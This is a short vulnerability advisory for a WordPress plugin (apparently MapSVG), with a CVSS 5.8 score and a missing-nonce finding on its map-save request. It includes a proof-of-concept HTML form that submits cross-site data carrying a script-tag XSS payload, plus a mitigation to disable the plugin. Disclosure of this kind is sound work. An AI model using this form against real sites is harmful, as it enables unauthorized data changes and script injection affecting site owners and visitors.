CVSS Summary
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
Last revised:
The plugin uses REST requests to modify post data, and does not check the nonce when doing so.
Current state: Reported
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=mapsvg_save"> <input type="text" name="data[title]" value="A bad value"> <input type="text" name="data[mapsvg_data]" value="<script>alert('hello')</script>"> <input type="text" name="data[map_id]" value="2"> <input type="submit"> </form>
Disable the plugin until a fix is released.